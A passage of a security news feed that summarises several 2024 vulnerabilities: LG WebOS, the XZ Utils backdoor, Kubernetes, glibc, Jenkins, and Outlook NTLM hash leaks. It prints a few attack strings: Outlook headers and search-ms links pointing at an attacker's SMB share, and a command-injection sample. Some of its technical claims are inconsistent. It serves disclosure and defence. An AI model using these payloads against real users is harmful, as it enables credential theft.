The post Compromising Cryptographic Key Security Through PuTTY: A Deep Dive into CVE-2024-31497 appeared first on Information Security Newspaper | Hacking News.

]]>
How to hack a LG Smart TV via vulnerabilities in LG WebOS? https://www.securitynewspaper.com/2024/04/09/how-to-hack-a-lg-smart-tv-via-vulnerabilities-in-lg-webos/ Tue, 09 Apr 2024 18:18:23 +0000 https://www.securitynewspaper.com/?p=27434 In a recent disclosure, cybersecurity firm Bitdefender has revealed a series of critical vulnerabilities within LG’s WebOS, the operating system used in many of the brand’s smart TVs. These vulnerabilities,Read More →

The post How to hack a LG Smart TV via vulnerabilities in LG WebOS? appeared first on Information Security Newspaper | Hacking News.

]]>
In a recent disclosure, cybersecurity firm Bitdefender has revealed a series of critical vulnerabilities within LG’s WebOS, the operating system used in many of the brand’s smart TVs. These vulnerabilities, affecting versions 4 through 7 of the OS, pose significant risks, ranging from unauthorized access and control over the devices to potential data breaches. Although the vulnerable service is intended for LAN access only, Shodan, the search engine for Internet-connected devices, identified over 91,000 devices that expose this service to the Internet. This comprehensive report provides an in-depth look at the vulnerabilities, their possible impacts, and the recommended measures for mitigation.

These vulnerabilities can be exploited to gain unauthorized access and control over the devices. Here’s a breakdown of each identified vulnerability with hypothetical examples to illustrate their potential exploits:

1. CVE-2023-6317: Authorization Mechanism Bypass

Description: This vulnerability allows an attacker to bypass the authorization mechanism of the WebOS. By setting a specific variable, an attacker can add an extra user to the TV set without proper authorization.

  • Technical Mechanism: This vulnerability allows unauthorized users to bypass the PIN verification process required to create a new user account on the TV. It exploits a flawed implementation in the account management service, where a variable (skipPrompt) is set to true if certain conditions are met, mistakenly granting account creation without the necessary user authentication.
  • Exploit Path: An attacker can send a specially crafted request that manipulates this variable by mimicking a legitimate user session, leading to the creation of a privileged user account without the owner’s consent.

Example: Suppose an attacker discovers that the WebOS service, which is only intended for LAN access, is exposed over the internet. The attacker crafts a request that exploits this service to set a variable that bypasses normal user authentication procedures, thus allowing them to add a new user with administrative privileges to the television without the owner’s knowledge.

2. CVE-2023-6318: Root Access Elevation

Description: Once initial access is gained via CVE-2023-6317, this vulnerability allows the attacker to elevate their access level to root, giving them full control over the device.

  • Technical Mechanism: Following initial access through CVE-2023-6317, this vulnerability leverages another flaw in the system’s command handling routines. It involves an authenticated command injection vulnerability within a service method designed to process system analytics reports (processAnalyticsReport).
  • Exploit Path: By manipulating the input parameters of this method, specifically the reportFile parameter, attackers can insert arbitrary commands that the system executes with root privileges. This is possible because the input is not properly sanitized before being passed to system command functions.

Example: After adding themselves as a user on the TV, the attacker exploits a flaw in another service that escalates their privileges. By sending a specially crafted request to this service, they can execute commands as the root user, allowing them to install malicious software, access all files on the device, and manipulate the TV’s operation.

3. CVE-2023-6319: Operating System Command Injection

Description: This vulnerability involves manipulating a library responsible for displaying music lyrics, allowing an attacker to inject and execute arbitrary operating system commands.

  • Technical Mechanism: This flaw allows command execution through the manipulation of a library used for displaying music lyrics. The vulnerability occurs when the lyrics file processing function does not properly sanitize the file path, allowing specially crafted files to execute arbitrary commands.
  • Exploit Path: Attackers can upload a malicious MP3 file accompanied by a lyrics file crafted to contain executable commands. When the TV software attempts to display the lyrics, the embedded commands are executed, potentially giving the attacker control over the TV’s operating system.

Example: An attacker uploads a malicious MP3 file with a specially crafted lyrics file to the TV. The lyrics file contains commands wrapped in the metadata, which the TV processes without proper sanitation. When the lyrics are displayed, the embedded commands are executed, potentially giving the attacker the ability to perform actions such as turning on the TV’s microphone for eavesdropping.

4. CVE-2023-6320: Authenticated Command Injection via API

Description: This vulnerability allows an attacker to inject authenticated commands through the com.webos.service.connectionmanager/tv/setVlanStaticAddress API endpoint, which manipulates the network configuration without proper input validation.

  • Technical Mechanism: This vulnerability is found in the com.webos.service.connectionmanager/tv/setVlanStaticAddress API endpoint, which allows for network configuration changes. The flaw stems from inadequate input validation, permitting command injection through parameters intended for configuring network settings.
  • Exploit Path: With authenticated access (possibly gained through exploiting CVE-2023-6317), an attacker can inject commands into the ip_address, bcast_address, and netmask parameters of this API endpoint. These commands are then executed by the system, allowing the attacker to alter network configurations or perform other unauthorized actions.

Example: Having gained authenticated access through previous exploits, the attacker uses this vulnerability to change the TV’s network settings, isolating it on a virtual LAN that routes all traffic through a server controlled by the attacker. This could be used to intercept sensitive information or serve as a pivot point for further attacks within the home network.

The identified vulnerabilities in LG’s WebOS affect multiple versions of the operating system, running on various LG TV models. Below is a table summarizing the affected versions and corresponding devices:

WebOS VersionModel NumbersVulnerabilities Affected
4.9.7LG43UM7000PLACVE-2023-6317, CVE-2023-6319
5.5.0OLED55CXPUACVE-2023-6317, CVE-2023-6318, CVE-2023-6319, CVE-2023-6320
6.3.3-442OLED48C1PUBCVE-2023-6317, CVE-2023-6318, CVE-2023-6319, CVE-2023-6320
7.3.1-43OLED55A23LACVE-2023-6317, CVE-2023-6319

Explanation:

  • WebOS 4.9.7 and 7.3.1-43 share similar vulnerabilities, primarily the authorization bypass and the operating system command injection via the music lyrics display mechanism.
  • WebOS 5.5.0 and 6.3.3-442 are affected by all four disclosed vulnerabilities, making them the most at-risk versions, potentially due to having broader functionality that interacts with more system components or more complex network settings.
  • The vulnerabilities span from basic authorization mechanism bypasses to more complex command injections that can give attackers deep access to the system.

Mitigation Measures for LG (Vendor)

  1. Patch Deployment:
    • Immediate Updates: LG should release patches for the affected WebOS versions as soon as possible. These updates should fix the root causes of the vulnerabilities, such as improper input validation and inadequate authorization checks.
    • Automatic Update Feature: Ensure that all WebOS devices are set to receive and install updates automatically, minimizing the window of vulnerability exposure.
  2. Enhanced Security Protocols:
    • Review and Reinforce: LG should conduct a thorough review of all API endpoints and internal mechanisms for handling user inputs and authentication processes. This includes reinforcing the use of proper sanitization and validation techniques to prevent injection attacks.
    • Secure Software Development Lifecycle (SDLC): Implement an SDLC with a strong focus on security, including regular code reviews, vulnerability assessments, and penetration testing.
  3. User Notification and Support:
    • Transparent Communication: Proactively inform users about the vulnerabilities and the steps being taken to address them. Provide clear instructions on how to update their devices.
    • Technical Support: Set up a dedicated helpline or online support system to assist users with the update process and to answer any security concerns.

Recommendations for Users

  1. Apply Updates Promptly:
    • Check for Updates: Users should manually check for software updates on their LG TV if automatic updates are not enabled. Applying these updates is crucial in protecting their devices from exploits.
    • Restart Devices: Ensure that the device is restarted after applying the update to enforce changes.
  2. Secure Network Configuration:
    • Network Segmentation: Place IoT devices on a separate network segment, reducing the risk of an attacker pivoting from a compromised TV to more sensitive devices like personal computers or storage.
    • Firewall and Router Settings: Configure firewalls and routers to block unnecessary inbound connections and limit what can be accessed from the smart TV.
  3. Increase Monitoring and Awareness:
    • Monitor Network Traffic: Use network monitoring tools to detect unusual activities that could indicate exploitation attempts, such as unexpected outbound connections or high volumes of data transfer.
    • Stay Informed: Regularly follow updates from LG and security researchers to stay informed about any new threats or patches.

Long-Term Security Enhancements

  1. Educational Campaigns:
    • Security Awareness: LG could offer educational resources on the importance of cybersecurity and best practices for securing IoT devices.
    • Workshops and Tutorials: Provide online tutorials or webinars that guide users on securing their home networks and understanding the security settings on their devices.
  2. Community Engagement:
    • Bug Bounty Programs: Initiate or enhance bug bounty programs to encourage the ethical disclosure of new vulnerabilities by external researchers.
    • Open Source Collaboration: Consider collaborating with the open-source community to allow external developers to contribute to the security robustness of WebOS.

By implementing these mitigation measures and recommendations, LG can help secure its devices against the identified vulnerabilities, while users can protect their home environments from potential breaches. This proactive approach is essential in building trust and ensuring the security of increasingly connected smart home ecosystems.

The post How to hack a LG Smart TV via vulnerabilities in LG WebOS? appeared first on Information Security Newspaper | Hacking News.

]]>
How to Check if a Linux Distribution is Compromised by the XZ Utils Backdoor in 6 Steps https://www.securitynewspaper.com/2024/04/02/how-to-check-if-a-linux-distribution-is-compromised-by-the-xz-utils-backdoor-in-6-steps/ Tue, 02 Apr 2024 22:06:47 +0000 https://www.securitynewspaper.com/?p=27430 In an unsettling development that emerged late last week, the open-source community was thrust into a state of high alert following the disclosure that XZ Utils, a fundamental compression utilityRead More →

The post How to Check if a Linux Distribution is Compromised by the XZ Utils Backdoor in 6 Steps appeared first on Information Security Newspaper | Hacking News.

]]>
In an unsettling development that emerged late last week, the open-source community was thrust into a state of high alert following the disclosure that XZ Utils, a fundamental compression utility widespread across Linux distributions, had been compromised. This startling revelation has left a significant mark on the open-source ecosystem, prompting a swift and coordinated response from maintainers and security professionals alike.

Discovery of the Backdoor

The initial discovery of the backdoor was made by Andres Freund, a Microsoft software engineer, during routine diagnostics on Debian sid (development) installations. Freund’s investigation, sparked by unusually high CPU usage during SSH logins and accompanying error alerts, led to the identification of the culprit: a malicious insertion within the liblzma library, a core component of the XZ package. This finding was subsequently designated with the vulnerability identifier CVE-2024-3094. Attribution for this calculated insertion has been directed at an individual known as “Jia Tan” (JiaT75 on GitHub), who, through an elaborate scheme of social engineering and the use of sock puppet accounts, gained the trust of the XZ Utils maintainer community. This long-term infiltration underscores the advanced nature of the threat actor involved, pointing towards a highly skilled and resourceful adversary.

Affected Distributions and Response

StatusDistributionResponse
AffectedFedora Rawhide and Fedora Linux 40 betaConfirmed by Red Hat
AffectedopenSUSE Tumbleweed and openSUSE MicroOSConfirmed by openSUSE maintainers
AffectedDebian testing, unstable, experimental distributionsConfirmed by Debian maintainers
AffectedKali Linux (updates between March 26th to March 29th)Confirmed by OffSec
AffectedSome Arch Linux virtual machine and container imagesConfirmed by Arch Linux maintainers
Not AffectedRed Hat Enterprise Linux (RHEL)Confirmed by Red Hat
Not AffectedUbuntuConfirmed by Ubuntu
Not AffectedLinux MintConfirmed by Linux Mint
Not AffectedGentoo LinuxConfirmed by Gentoo Linux
Not AffectedAmazon Linux and Alpine LinuxConfirmed by Amazon Linux and Alpine Linux maintainers

Guidance and Recommendations

In light of these disclosures, affected parties have been advised to approach the situation as a definitive security incident, necessitating a comprehensive review and mitigation process. This includes the diligent examination for any unauthorized access or misuse, the rotation of exposed credentials, and a thorough security audit of systems that might have been compromised during the exposure window.

Insight into the Backdoor Mechanism

The intricacy of the backdoor, embedded within the xz-utils’ liblzma library and manifesting under precise conditions, notably through remote, unprivileged connections to public SSH ports, speaks volumes about the sophistication of the threat actors behind this maneuver. This backdoor not only raises concerns over performance degradation but also poses a significant risk to the integrity and security of the affected systems.

How to detect if you are a victim

In light of the recent discovery of the CVE-2024-3094 backdoor in XZ Utils versions 5.6.0 and 5.6.1, the cybersecurity community has been on high alert. Binarly has introduced a free scanner to identify the presence of this backdoor in affected systems. Below is a detailed tutorial, including examples, on how to use the Binarly Free Scanner to detect the CVE-2024-3094 backdoor in your systems.

Step 1: Understanding the Threat

The CVE-2024-3094 backdoor in XZ Utils versions 5.6.0 and 5.6.1 poses a significant security risk, potentially allowing unauthorized remote access. It’s crucial to grasp the severity of this issue before proceeding.

Example: Imagine a scenario where an organization’s critical systems are running on a compromised version of XZ Utils, leaving the network vulnerable to attackers who could gain unauthorized access through the backdoor.

Step 2: Accessing the Binarly Free Scanner

Navigate to XZ.fail, the dedicated website Binarly set up for the scanner.

Example: Open your web browser and type “https://xz.fail” in the address bar to access the Binarly Free Scanner’s homepage.

Step 3: Utilizing the Scanner

The Binarly Free Scanner uses advanced static analysis to detect the backdoor by examining ifunc transition behaviors in the binaries.

Example: After accessing XZ.fail, you’ll be prompted to upload or specify the path to the binary files you wish to scan. Suppose you want to check a file named example.xz; you would select this file for scanning through the web interface or command line, depending on the tool’s usage options provided.

Step 4: Interpreting the Results

Once the scan completes, the scanner will report back on whether the CVE-2024-3094 backdoor was detected in the scanned files.

Example: If the scanner finds the backdoor in example.xz, it might display a message such as “Backdoor Detected: CVE-2024-3094 present in example.xz”. If no backdoor is found, a message like “No Backdoor Detected: Your files are clean” would appear.

Step 5: Taking Action

If the scanner detects the backdoor, immediate action is required to remove the compromised binaries and replace them with secure versions.

Example: For a system administrator who finds the backdoor in example.xz, the next steps would involve removing this file, downloading a secure version of XZ Utils from a trusted source, and replacing the compromised file with this clean version.

Step 6: Continuous Vigilance

Regularly scan your systems with the Binarly Free Scanner and other security tools to ensure no new threats have compromised your binaries.

Example: Set a monthly reminder to use the Binarly Free Scanner on all critical systems, especially after installing updates or adding new software packages, to catch any instances of the CVE-2024-3094 backdoor or other vulnerabilities.

The Binarly Free Scanner is a powerful tool in the fight against the CVE-2024-3094 backdoor, offering a reliable method for detecting and addressing this significant threat. By following these steps and incorporating the examples provided, users can effectively safeguard their systems from potential compromise.

The accidental discovery of this backdoor by Freund represents a crucial turning point, underscoring the importance of vigilant and proactive security practices within the open-source domain. This incident serves as a stark reminder of the vulnerabilities that can arise in even the most trusted components of the digital infrastructure. It has sparked a renewed debate on the necessity for enhanced security protocols and collaborative efforts to safeguard crucial open-source projects against increasingly sophisticated threats.

In the aftermath, the open-source community and its stewards are called upon to reassess their security posture, emphasizing the need for comprehensive auditing, transparent communication, and the adoption of robust security measures to prevent future compromises. This incident not only highlights the vulnerabilities inherent in the digital landscape but also the resilience and collaborative spirit of the open-source community in responding to and mitigating such threats.

The post How to Check if a Linux Distribution is Compromised by the XZ Utils Backdoor in 6 Steps appeared first on Information Security Newspaper | Hacking News.

]]>
CVE-2023-5528: Kubernetes Flaw Jeopardizing Windows Node That Can’t Be Ignored https://www.securitynewspaper.com/2024/03/14/cve-2023-5528-kubernetes-flaw-jeopardizing-windows-node-that-cant-be-ignored/ Fri, 15 Mar 2024 00:02:01 +0000 https://www.securitynewspaper.com/?p=27415 In recent developments, cybersecurity experts have raised alarms over a high-severity vulnerability identified in Kubernetes, marked as CVE-2023-5528. This critical flaw has the potential to allow attackers to execute arbitraryRead More →

The post CVE-2023-5528: Kubernetes Flaw Jeopardizing Windows Node That Can’t Be Ignored appeared first on Information Security Newspaper | Hacking News.

]]>
In recent developments, cybersecurity experts have raised alarms over a high-severity vulnerability identified in Kubernetes, marked as CVE-2023-5528. This critical flaw has the potential to allow attackers to execute arbitrary code with system privileges across all Windows endpoints within a cluster. Akamai, a leading global content delivery network, cybersecurity, and cloud service company, has issued a warning regarding the severity of this vulnerability and its implications for organizations utilizing Kubernetes on Windows platforms.

Understanding CVE-2023-5528

Akamai’s security researcher, Tomer Peled, has uncovered a critical vulnerability in Kubernetes, designated as CVE-2023-5528, with a CVSS score of 7.2. This vulnerability is particularly alarming as it allows for remote code execution with SYSTEM privileges across all Windows endpoints within a Kubernetes cluster. The exploitation mechanism involves the application of malicious YAML files to the cluster, posing a severe security threat that could lead to a full takeover of all Windows nodes in the affected cluster.

CVE-2023-5528 can be exploited in default installations of Kubernetes versions earlier than 1.28.4. This vulnerability has been verified against both on-premises deployments and Azure Kubernetes Service (AKS). The blog post provides a proof-of-concept YAML file and an Open Policy Agent (OPA) rule to help block this vulnerability, emphasizing the critical nature of this security flaw.

Technical Details and Proof of Concept of CVE-2023-5528

The vulnerability CVE-2023-5528, discovered by Akamai security researcher Tomer Peled, is a high-severity flaw in Kubernetes with a CVSS score of 7.2. It allows for remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster. This section delves into the technical specifics and provides a proof of concept to understand the vulnerability’s exploitation mechanism.

Vulnerability Origin

The root cause of CVE-2023-5528 lies in the insecure handling of the subPath parameter in YAML files that create pods with volumes in Kubernetes. This lack of user input sanitization opens the door for command injection vulnerabilities. The specific focus for CVE-2023-5528 is on Kubernetes clusters running on Windows nodes, where the exploitation of this vulnerability can lead to full control over all Windows nodes in a cluster.

Kubernetes Volumes and PersistentVolumes

Kubernetes volumes support the sharing of data between pods or storing it persistently outside of a pod’s lifecycle. Local volumes and hostPath volumes are two types that are relevant to this vulnerability. Local volumes allow users to mount disk partitions inside a pod, while hostPath volumes enable the mounting of directories from the node into a pod.

The exploitation process involves creating a pod that includes a local volume. During this process, the kubelet service eventually calls the MountSensitive() function, which includes a command line call to exec.command. This call creates a symlink between the volume’s location on the node and inside the pod. By manipulating this process, an attacker can inject malicious commands.

Proof of Concept

The proof of concept involves manipulating the local.path parameter inside the persistentVolume YAML file to include a malicious command. This command is then executed during the volume mounting process. For demonstration purposes, a benign command like &calc.exe&& is used, which opens a calculator on the node. However, this method can be adapted to execute more malicious commands.

When this YAML file is applied to the cluster, the malicious command is executed, demonstrating the vulnerability’s potential for exploitation.

Mitigation and Patch Analysis

The Kubernetes team addressed this vulnerability by replacing the vulnerable command line call in the MountSensitive() function with a native Go function, os.Symlink(), which securely performs the symlink operation without the possibility of command injection.

To determine vulnerability, administrators can check their Kubernetes version and the presence of Windows nodes in their cluster. The vulnerability affects default installations of Kubernetes earlier than version 1.28.4.

CVE-2023-5528 highlights the critical importance of input sanitization in Kubernetes and the potential for severe security implications when vulnerabilities are exploited. By understanding the technical details and proof of concept, administrators and security professionals can better assess their systems’ vulnerability and apply necessary patches and mitigations to protect their Kubernetes clusters.

Broader Implications for Kubernetes Security

The discovery of CVE-2023-5528 highlights the ongoing security challenges facing Kubernetes environments. As organizations increasingly adopt containerization and Kubernetes for their operational needs, the security of these systems becomes paramount. This incident serves as a reminder of the importance of maintaining rigorous security practices, staying informed about emerging vulnerabilities, and promptly addressing identified threats.

The exploitation of the high-severity Kubernetes vulnerability CVE-2023-5528 poses a significant threat to organizations using Kubernetes on Windows platforms. The potential for arbitrary code execution with system privileges underscores the need for immediate and comprehensive security measures. By following the recommendations provided by cybersecurity experts and entities like Akamai, organizations can mitigate the risks associated with this vulnerability and safeguard their Kubernetes environments against potential threats. As the cybersecurity landscape continues to evolve, staying vigilant and proactive in addressing vulnerabilities will be key to maintaining the security and integrity of critical systems.

The post CVE-2023-5528: Kubernetes Flaw Jeopardizing Windows Node That Can’t Be Ignored appeared first on Information Security Newspaper | Hacking News.

]]>
Hacking Debian, Ubuntu, Redhat& Fedora servers using a single vulnerability in 2024 https://www.securitynewspaper.com/2024/02/01/hacking-debian-ubuntu-redhat-fedora-servers-using-a-single-vulnerability-in-2024/ Thu, 01 Feb 2024 22:00:35 +0000 https://www.securitynewspaper.com/?p=27392 The recent discovery of a significant flaw in the GNU C Library (glibc), a fundamental component of major Linux distributions, has raised serious security concerns. This flaw grants attackers rootRead More →

The post Hacking Debian, Ubuntu, Redhat& Fedora servers using a single vulnerability in 2024 appeared first on Information Security Newspaper | Hacking News.

]]>
The recent discovery of a significant flaw in the GNU C Library (glibc), a fundamental component of major Linux distributions, has raised serious security concerns. This flaw grants attackers root access, posing a critical threat to the security of Linux systems.

  • Vulnerability in GNU C Library (glibc): The GNU C Library, commonly known as glibc, is an essential part of Linux distributions. It provides the core libraries for the system, including those used for file handling, mathematical computations, and system calls.
  • Root Access Granted: The flaw discovered in glibc allows attackers to gain full root access to Linux machines. Root access means having complete control over the system, enabling an attacker to perform any action, including installing software, accessing all files, and modifying system configurations.

CVE ID: CVE-2023-6246

  • Description: This vulnerability is related to a dynamic memory buffer overflow and is classified as a Local Privilege Escalation (LPE) issue. It was found in glibc’s __vsyslog_internal() function, which is called by the widely-used syslog and vsyslog functions.
  • Impact: The flaw allows unprivileged attackers to gain root access on various major Linux distributions in their default configurations. This level of access can enable attackers to take complete control over the affected system.
  • Severity: Given its potential for granting root access, this vulnerability is considered highly severe.

How the Flaw Works

  • Local Privilege Escalation: The vulnerability is a local privilege escalation (LPE) issue. This means that an attacker who already has access to the system (even with limited privileges) can exploit this flaw to gain root-level access.
  • Exploitation Requirements: To exploit this flaw, attackers need a Set-User-ID (SUID) binary. SUID is a special type of file permission that allows users to execute a program with the permissions of the file owner, which in many cases is the root user.

Impact and Severity

  • Widespread Impact: Given the ubiquitous use of glibc in Linux distributions, the impact of this vulnerability is widespread, affecting a vast number of systems and applications.
  • High Severity: The flaw is considered high severity due to its potential to grant attackers complete control over the affected systems.

Mitigation and Response

  • Disabling SUID Binaries: One suggested mitigation is to disable SUID binaries using “no new privileges” mode, which can be implemented with tools like systemd or bwrap.
  • Patch and Update: Users and administrators are urged to apply patches and updates provided by their Linux distribution as soon as they become available. Staying updated is crucial in preventing the exploitation of this vulnerability.

The discovery of the glibc flaw that grants root access to major Linux distributions is a stark reminder of the importance of system security and the need for constant vigilance. Users and administrators must take immediate action to mitigate the risk by applying patches and employing security best practices. As Linux continues to be a backbone for many systems and networks, ensuring its security is paramount for the integrity of countless applications and services.

The post Hacking Debian, Ubuntu, Redhat& Fedora servers using a single vulnerability in 2024 appeared first on Information Security Newspaper | Hacking News.

]]>
Exploit code: How the New Jenkins Vulnerability Could Compromise Your Data https://www.securitynewspaper.com/2024/01/29/exploit-code-how-the-new-jenkins-vulnerability-could-compromise-your-data/ Mon, 29 Jan 2024 22:06:53 +0000 https://www.securitynewspaper.com/?p=27388 Recent news about a critical vulnerability in Jenkins, identified as CVE-2024-23897, has raised significant concerns in the cybersecurity community. This vulnerability has been highlighted due to the publication of aRead More →

The post Exploit code: How the New Jenkins Vulnerability Could Compromise Your Data appeared first on Information Security Newspaper | Hacking News.

]]>
Recent news about a critical vulnerability in Jenkins, identified as CVE-2024-23897, has raised significant concerns in the cybersecurity community. This vulnerability has been highlighted due to the publication of a Proof of Concept (PoC) exploit, which has increased the risks associated with this issue.

Overview of the Vulnerability (CVE-2024-23897)

The critical vulnerability in Jenkins, CVE-2024-23897, allows unauthenticated attackers with ‘overall/read’ permission to read data from arbitrary files on the Jenkins controller file system. This flaw poses a severe risk as it enables attackers to gain access to sensitive information, potentially leading to further exploitation of the system.

The exploit for the Jenkins vulnerability, identified as CVE-2024-23897, is a critical security flaw that has significant implications. To understand this exploit, it’s important to break down its components and how it operates:

Nature of the Vulnerability

  • Jenkins System: Jenkins is an open-source automation server widely used in continuous integration and continuous delivery (CI/CD) pipelines. It helps automate various aspects of software development, such as building, testing, and deploying applications.
  • Vulnerability Type: CVE-2024-23897 is a Remote Code Execution (RCE) vulnerability. RCE vulnerabilities are particularly severe because they allow an attacker to execute arbitrary code on the victim’s system remotely.

How the Exploit Works

  1. Exploitation of Permissions: The vulnerability allows unauthenticated attackers with ‘overall/read’ permissions to read data from arbitrary files on the Jenkins controller file system. This means that even without full administrative privileges, attackers can access sensitive information.
  2. Reading Arbitrary Files: The exploit enables attackers to read the first few lines of arbitrary files on the Jenkins controller. This could include configuration files, source code, credentials, or any other sensitive data stored on the server.
  3. Potential for Further Exploitation: While the primary capability is to read files, the exposure of sensitive data could lead to further exploitation. For instance, if credentials are obtained, attackers could escalate their access privileges.

The Criticality of the Exploit

  • Unauthenticated Access: The fact that the exploit can be triggered by unauthenticated users makes it particularly dangerous. It lowers the barrier for attackers, as they do not need to compromise an account before exploiting this vulnerability.
  • Ease of Execution: The release of a Proof of Concept (PoC) means that the exploit can be replicated easily by attackers who have access to this PoC. This increases the likelihood of widespread exploitation.

Mitigation and Response

  • Patch Availability: Jenkins has released a patch to address this vulnerability. It is crucial for users and administrators of Jenkins to apply this patch immediately to mitigate the risk.
  • Security Best Practices: Regularly updating software, monitoring systems for unusual activities, and following security best practices are essential steps in protecting against such exploits.

Security experts have developed curated Sigma rules to detect exploitation attempts of this vulnerability. These rules are crucial for organizations using Jenkins, as they provide a way to identify and respond to any malicious activities related to CVE-2024-23897.

The Severity of the Issue

Rated as critical, this vulnerability has garnered attention due to the ease with which it can be exploited and the potential damage it can cause. The publication of the PoC exploit has escalated the situation, as it provides attackers with a ready-made tool to exploit this vulnerability.

Response from the Jenkins Community

The Jenkins community has been quick to respond to this threat. A patch has been released to address the vulnerability, and users are strongly advised to update their Jenkins installations as soon as possible. The prompt release of the patch highlights the community’s commitment to security and its proactive approach to addressing such critical issues.

Real-World Implications

There have been reports of the PoC exploits for the Jenkins vulnerability being targeted in the wild. This real-world exploitation underscores the importance of immediate action by organizations using Jenkins. Delaying the application of the patch could leave systems vulnerable to attacks, which could lead to severe consequences.

The discovery and subsequent publication of the PoC exploit for the critical Jenkins vulnerability, CVE-2024-23897, serve as a stark reminder of the importance of cybersecurity vigilance. Organizations using Jenkins must prioritize the application of the latest patch to protect their systems from potential exploitation. The situation also highlights the need for continuous monitoring and rapid response mechanisms to address emerging cybersecurity threats.

The post Exploit code: How the New Jenkins Vulnerability Could Compromise Your Data appeared first on Information Security Newspaper | Hacking News.

]]>
How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer https://www.securitynewspaper.com/2024/01/22/how-to-steal-windows-password-via-outlook-email-exploiting-vulnerabilities-in-windows-performance-analyzer-wpa-and-file-explorer/ Mon, 22 Jan 2024 22:22:54 +0000 https://www.securitynewspaper.com/?p=27383 Varonis Threat Labs has uncovered a significant vulnerability in Microsoft Outlook (CVE-2023-35636) that allows attackers to access NTLM v2 hashed passwords. This discovery also includes vulnerabilities in Windows Performance AnalyzerRead More →

The post How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer appeared first on Information Security Newspaper | Hacking News.

]]>
Varonis Threat Labs has uncovered a significant vulnerability in Microsoft Outlook (CVE-2023-35636) that allows attackers to access NTLM v2 hashed passwords. This discovery also includes vulnerabilities in Windows Performance Analyzer (WPA) and Windows File Explorer, posing serious security risks.

What is CVE-2023-35636?

CVE-2023-35636 is an exploit targeting the calendar sharing function in Microsoft Outlook. By adding two specific headers to an email, attackers can direct Outlook to share content and contact a designated machine, thereby intercepting an NTLM v2 hash.

Understanding NTLM v2

NTLM v2 is a cryptographic protocol used by Microsoft Windows for authenticating users to remote servers. Despite being more secure than its predecessor, NTLM v2 is still vulnerable to offline brute-force and authentication relay attacks. The protocol involves transporting passwords as hashes, which, without salting, are password equivalent.

Exploitation of NTLM v2 Hashes

Attackers can use NTLM v2 hashes in two primary ways:

  1. Offline brute-force attacks: Here, attackers access a copy of the NTLM v2 hash and generate all possible passwords to find a match.
  2. Authentication relay attacks: This involves intercepting an NTLM v2 authentication request and forwarding it to a different server.

Leaking NTLM v2 Hashes Using Outlook

The Outlook vulnerability lies in its calendar sharing feature. By crafting an email with specific headers, attackers can redirect the hashed password to their machine.

The Outlook Exploit:
  1. “Content-Class” = “Sharing” — Indicates the email contains sharing content.
  2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — Directs the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes Using URI Handlers and WPA

URI handlers in operating systems allow applications to register for specific URI types. Windows Performance Analyzer (WPA) uses a URI handler “WPA://” by default. Attackers can exploit this to authenticate using NTLM v2 over the open web.

The WPA Exploit

The exploit involves a simple payload that directs the victim’s machine to access the attacker’s machine via SMB, potentially leaking the NTLM v2 hash.

Attack Scenario

Step 1: Crafting the Malicious Email

  1. Attacker’s Preparation: The attacker prepares an email with two specific headers:
    • "Content-Class" = "Sharing": This header tells Outlook that the email contains sharing content.
    • "x-sharing-config-url" = \\[Attacker's Machine]\a.ics: This header points the victim’s Outlook to a file (a.ics) hosted on the attacker’s machine.

Step 2: Victim Receives the Email

  1. Victim’s Action: The victim receives the email and interacts with it (e.g., clicks on a link or button in the email that says “Open this iCal”).
  2. Outlook’s Response: Due to the headers in the email, Outlook attempts to retrieve the a.ics file from the attacker’s machine.

Step 3: Intercepting the NTLM v2 Hash

  1. Hash Transmission: When Outlook tries to access the file on the attacker’s machine, it sends an NTLM v2 hash of the user’s password for authentication.
  2. Attacker’s Interception: The attacker captures this hash.

Step 4: Exploiting the Hash

  1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack. This involves trying various password combinations against the hash until a match is found.
  2. Gaining Unauthorized Access: Once the correct password is determined, the attacker can use it to access the victim’s account or system.

Example

Imagine a scenario where Alice, an employee at a corporation, receives an email that appears to be a calendar invite from a colleague. The email contains a button saying “Open this iCal”. Unbeknownst to Alice, the email is actually from an attacker and is crafted to exploit CVE-2023-35636.

When Alice clicks the button, her Outlook tries to fetch the a.ics file from what she believes is her colleague’s machine but is actually the attacker’s server. During this process, her computer sends an NTLM v2 hash of her password to the attacker’s server for authentication.

The attacker, now in possession of Alice’s NTLM v2 hash, uses a powerful computer to perform an offline brute-force attack. Eventually, the attacker discovers Alice’s actual password and gains unauthorized access to her corporate account, potentially leading to data theft or further network compromise.

Leaking NTLM v2 Hashes Using Windows File Explorer

How a similar attack to the Outlook vulnerability can be executed using Windows File Explorer. This involves exploiting the “subquery” and “crumb” parameters in the URI handler “search-ms” of Windows File Explorer.

Background: Windows File Explorer and URI Handlers

Windows File Explorer, known as explorer.exe, is a file management application in Windows. It includes a feature called URI handlers, which allows it to process special types of links (search-ms://) that can trigger specific actions within the File Explorer.

Attack Scenario Using Windows File Explorer

Step 1: Crafting the Malicious Link

  1. Attacker’s Preparation: The attacker creates a malicious link using the search-ms URI scheme. This link includes special parameters that will direct the victim’s File Explorer to the attacker’s machine. There are two methods to do this:
    • Using the “subquery” parameter: search-ms://query=poc&subquery=\\[Attacker's Machine]\poc.search-ms
    • Using the “crumb” parameter: search-ms://query=poc&crumb=location:\\[Attacker's Machine]

Step 2: Delivering the Malicious Link

  1. Distribution: The attacker sends this link to the victim via email, social media, or other means. The link might be disguised as a legitimate search query or file request.

Step 3: Victim Interacts with the Link

  1. Victim’s Action: The victim clicks on the link, believing it to be legitimate.
  2. File Explorer’s Response: The victim’s File Explorer attempts to execute the search or access the file specified in the link, which points to the attacker’s machine.

Step 4: Intercepting the NTLM v2 Hash

  1. Hash Transmission: To access the resource on the attacker’s machine, the victim’s system sends an NTLM v2 hash of the user’s password for authentication.
  2. Attacker’s Interception: The attacker captures this hash from their machine.

Step 5: Exploiting the Hash

  1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack, attempting to find the actual password.
  2. Gaining Unauthorized Access: If successful, the attacker can use the password to gain unauthorized access to the victim’s system or network.

Example

Consider a scenario where Bob, a user, receives an email with a link that appears to direct him to a useful file search on his company’s network. The link is actually a malicious search-ms URL crafted by an attacker. When Bob clicks the link, his File Explorer tries to execute the search, which unknowingly points to the attacker’s server.

